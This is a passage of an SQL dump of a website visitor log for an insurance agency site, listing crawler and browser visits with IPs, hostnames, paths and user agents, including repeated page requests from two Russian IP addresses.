+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11898,'0b_b54fdcc9064a4a7a5c615778211937a1','1459728454','66.249.75.96','crawl-66-249-75-96.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11900,'0b_b54fdcc9064a4a7a5c615778211937a1','1459728455','66.249.75.89','crawl-66-249-75-89.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11903,'0b_4ffcfc62a3404dd3226c99f5839984d9','1459729764','51.254.130.61','61.ip-51-254-130.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11906,'0b_4ffcfc62a3404dd3226c99f5839984d9','1459729768','51.254.130.61','61.ip-51-254-130.eu','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11907,'0b_4ffcfc62a3404dd3226c99f5839984d9','1459729771','51.254.130.61','61.ip-51-254-130.eu','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11909,'0b_a26754502c4f13371b3c80b947d75c96','1459731200','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(11912,'0b_a26754502c4f13371b3c80b947d75c96','1459731203','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(11913,'0b_82f9500248aa008b1119bfd6540f4a9f','1459731737','180.76.15.9','baiduspider-180-76-15-9.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11916,'0b_b3a50d65480034db9b625a35554ff1ae','1459732473','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11918,'0b_ed9f50a38ecf075d52884bc7c97a70c4','1459732813','100.43.81.146','spider-100-43-81-146.yandex.com','/SSO/235_14.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11919,'0b_f841273cb14236e3692e67cc3b593997','1459733188','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11921,'0b_cf5117c8e289835b2f30f74d1925a7c9','1459733206','40.77.167.82','msnbot-40-77-167-82.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11922,'0b_2502ae7df0fa5b3cd4371691b18c23cc','1459734127','180.76.15.153','baiduspider-180-76-15-153.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11925,'0b_62be71ae18dca9c862cacb8ecd28b3a0','1459737814','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11927,'0b_df3721a0b083eae3e1cb4363a3a1d645','1459745013','157.55.39.161','msnbot-157-55-39-161.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11928,'0b_53671a5dda478718c489ab0add92946f','1459746865','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11931,'0b_6dfab431151b9f2f1fc26ce6855b68fa','1459747708','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11933,'0b_b63b957cc57594d2b7eea3479b3768a8','1459750615','207.241.231.170','crawl825.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(11936,'0b_33d205d76403a7f3a947b4ec9b7eb024','1459751515','207.241.231.170','crawl825.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(11939,'0b_b59b5322103a682277b05a2e95127d50','1459752074','66.249.75.89','crawl-66-249-75-89.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11942,'0b_33d205d76403a7f3a947b4ec9b7eb024','1459752415','207.241.231.170','crawl825.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(11943,'0b_4178bb10307e25a769f3397c01ea02d8','1459752919','207.241.237.220','crawl429.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(11945,'0b_4178bb10307e25a769f3397c01ea02d8','1459752926','207.241.237.220','crawl429.us.archive.org','/','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/','',0,'','','','','','org_bot','','','','0','0',0),(11948,'0b_6cee58c6eb6a414f491b13b2e338981c','1459753054','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11951,'0b_d58061ac073bff718628be1a5eb72d2f','1459753742','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11954,'0b_198b6b478d5bc718e106f09ca929b7c2','1459758372','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/sso/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11955,'0b_e6bda95955a1c06d4562746be77b2703','1459761494','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11958,'0b_b73958e2242c3b906af2bf0988551268','1459763909','188.143.232.27','188.143.232.27','/SSO/235_19.html','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(11960,'0b_af2f629724c099cbbf4d5c1a2daabdb1','1459763911','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','0','0',0),(11963,'0b_af2f629724c099cbbf4d5c1a2daabdb1','1459763952','188.143.232.32','188.143.232.32','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 40','ru','','','','','','','0','0',0),(11964,'0b_af2f629724c099cbbf4d5c1a2daabdb1','1459763975','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','0','0',0),(11967,'0b_af2f629724c099cbbf4d5c1a2daabdb1','1459763987','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','0','0',0),(11970,'0b_af2f629724c099cbbf4d5c1a2daabdb1','1459763998','188.143.232.32','188.143.232.32','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','0','0',0),(11972,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764009','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11973,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764019','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11976,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764030','188.143.232.32','188.143.232.32','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11979,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764041','188.143.232.32','188.143.232.32','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11982,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764052','188.143.232.32','188.143.232.32','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11985,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764063','188.143.232.32','188.143.232.32','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11988,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764074','188.143.232.32','188.143.232.32','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11991,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764085','188.143.232.32','188.143.232.32','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11994,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764095','188.143.232.32','188.143.232.32','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11996,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764109','188.143.232.32','188.143.232.32','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(11999,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764119','188.143.232.32','188.143.232.32','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12000,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764130','188.143.232.32','188.143.232.32','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12002,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764141','188.143.232.32','188.143.232.32','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12005,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764152','188.143.232.32','188.143.232.32','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12008,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764163','188.143.232.32','188.143.232.32','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12009,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764174','188.143.232.32','188.143.232.32','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12011,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764184','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12012,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764195','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset#myCarousel3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12014,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764207','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset#myCarousel2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12017,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764378','188.143.232.32','188.143.232.32','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12020,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764444','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12023,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764455','188.143.232.27','188.143.232.27','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12026,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764465','188.143.232.27','188.143.232.27','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12029,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764476','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12030,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764488','188.143.232.27','188.143.232.27','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12033,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764498','188.143.232.27','188.143.232.27','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12036,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764509','188.143.232.27','188.143.232.27','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12039,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764521','188.143.232.27','188.143.232.27','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12041,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764531','188.143.232.27','188.143.232.27','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12042,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764542','188.143.232.27','188.143.232.27','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12044,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764552','188.143.232.27','188.143.232.27','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12045,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764563','188.143.232.27','188.143.232.27','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12047,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764574','188.143.232.27','188.143.232.27','/about-us/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12050,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764584','188.143.232.27','188.143.232.27','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12053,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764595','188.143.232.27','188.143.232.27','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12056,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764606','188.143.232.27','188.143.232.27','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12057,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764616','188.143.232.27','188.143.232.27','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12060,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764627','188.143.232.27','188.143.232.27','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12062,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764637','188.143.232.27','188.143.232.27','/about-us','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12065,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764648','188.143.232.27','188.143.232.27','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12066,'0b_6b96cbaa521f3e77334aabc4e92225fb','1459764660','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12069,'0b_1a61903c223adae197aefe792a12f0bc','1459764909','188.143.232.32','188.143.232.32','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12071,'0b_b4f1093e15683458ad4385ef36b66324','1459764924','188.143.234.155','188.143.234.155','/agent-tools/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12072,'0b_1a61903c223adae197aefe792a12f0bc','1459764974','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12074,'0b_1a61903c223adae197aefe792a12f0bc','1459764985','188.143.232.32','188.143.232.32','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12077,'0b_1a61903c223adae197aefe792a12f0bc','1459764996','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12078,'0b_1a61903c223adae197aefe792a12f0bc','1459765007','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12080,'0b_1a61903c223adae197aefe792a12f0bc','1459765017','188.143.232.32','188.143.232.32','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12083,'0b_1a61903c223adae197aefe792a12f0bc','1459765028','188.143.232.32','188.143.232.32','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12086,'0b_1a61903c223adae197aefe792a12f0bc','1459765038','188.143.232.32','188.143.232.32','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12087,'0b_1a61903c223adae197aefe792a12f0bc','1459765049','188.143.232.32','188.143.232.32','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12090,'0b_1a61903c223adae197aefe792a12f0bc','1459765060','188.143.232.32','188.143.232.32','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12092,'0b_1a61903c223adae197aefe792a12f0bc','1459765073','188.143.232.32','188.143.232.32','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12095,'0b_1a61903c223adae197aefe792a12f0bc','1459765083','188.143.232.32','188.143.232.32','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12098,'0b_1a61903c223adae197aefe792a12f0bc','1459765094','188.143.232.32','188.143.232.32','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12099,'0b_1a61903c223adae197aefe792a12f0bc','1459765104','188.143.232.32','188.143.232.32','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12101,'0b_1a61903c223adae197aefe792a12f0bc','1459765115','188.143.232.32','188.143.232.32','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12104,'0b_1a61903c223adae197aefe792a12f0bc','1459765125','188.143.232.32','188.143.232.32','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12105,'0b_1a61903c223adae197aefe792a12f0bc','1459765136','188.143.232.32','188.143.232.32','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12107,'0b_1a61903c223adae197aefe792a12f0bc','1459765147','188.143.232.32','188.143.232.32','/insentives','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12110,'0b_1a61903c223adae197aefe792a12f0bc','1459765156','188.143.232.32','188.143.232.32','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12113,'0b_1a61903c223adae197aefe792a12f0bc','1459765167','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 